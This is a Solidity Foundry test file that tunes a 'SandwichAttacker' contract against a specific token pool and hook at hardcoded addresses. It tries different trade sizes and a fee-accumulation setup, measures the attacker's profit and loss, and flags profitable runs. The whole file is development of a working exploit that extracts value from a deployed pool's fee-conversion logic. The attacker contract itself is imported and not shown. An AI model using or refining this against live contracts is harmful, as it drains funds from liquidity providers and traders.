// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import "forge-std/Test.sol";
import "./Sandwich.t.sol";

contract SandwichTunedTest is Test {
    address constant WETH = 0x4200000000000000000000000000000000000006;
    address constant LOCKER = 0x63D2DfEA64b3433F4071A98665bcD7Ca14d93496;
    SandwichAttacker attacker;

    function setUp() public {
        attacker = new SandwichAttacker();
        deal(WETH, address(attacker), 1 ether);
    }

    // Test with tiny amounts where fee conversion is proportionally larger
    function test_tinySwaps() public {
        address token = 0x59D916075b3F4DCd4121E4AD2Fb79fF7E8677b07;
        address hook = 0xd60D6B218116cFd801E28F78d011a203D2b068Cc;
        PoolKey memory key = PoolKey({ currency0: WETH, currency1: token, fee: 0x800000, tickSpacing: int24(200), hooks: hook });

        uint256[] memory sizes = new uint256[](5);
        sizes[0] = 0.0001 ether;
        sizes[1] = 0.0005 ether;
        sizes[2] = 0.00001 ether;
        sizes[3] = 0.00005 ether;
        sizes[4] = 0.000001 ether;

        for (uint256 i = 0; i < sizes.length; i++) {
            deal(WETH, address(attacker), 1 ether);
            uint256 before = IERC20(WETH).balanceOf(address(attacker));
            try attacker.attack(token, LOCKER, sizes[i], key) {
                uint256 after_ = IERC20(WETH).balanceOf(address(attacker));
                int256 pnl = int256(after_) - int256(before);
                emit log_named_uint("SIZE (wei)", sizes[i]);
                emit log_named_int("PnL (wei)", pnl);
            } catch {
                emit log_named_uint("FAILED size", sizes[i]);
            }
        }
    }

    // Test: what if we do a swap that triggers collectRewards on a HIGH VOLUME token?
    // First let's simulate some trades to accumulate fees, then sandwich
    function test_afterTradeAccumulation() public {
        address token = 0x59D916075b3F4DCd4121E4AD2Fb79fF7E8677b07;
        address hook = 0xd60D6B218116cFd801E28F78d011a203D2b068Cc;
        PoolKey memory key = PoolKey({ currency0: WETH, currency1: token, fee: 0x800000, tickSpacing: int24(200), hooks: hook });

        // First, simulate some big trades to accumulate fees in the pool
        // Each trade generates 1% in fees that will be converted next time
        SandwichAttacker trader = new SandwichAttacker();
        deal(WETH, address(trader), 10 ether);

        // Big buy - generates fees
        try trader.attack(token, address(0), 1 ether, key) {} catch {}

        // Big sell using a different approach - get tokens and sell back
        // Actually the trader already bought and sold in the attack...
        // The fees from the trader's swaps will accumulate

        // Now our sandwich: the fees generated by the trader are sitting uncollected
        deal(WETH, address(attacker), 1 ether);
        uint256 before = IERC20(WETH).balanceOf(address(attacker));

        try attacker.attack(token, LOCKER, 0.01 ether, key) {
            uint256 after_ = IERC20(WETH).balanceOf(address(attacker));
            int256 pnl = int256(after_) - int256(before);
            emit log_named_int("PnL after accumulated fees", pnl);
            if (pnl > 0) {
                emit log("*** PROFITABLE ***");
            }
        } catch {
            emit log("Sandwich failed after accumulation");
        }
    }
}
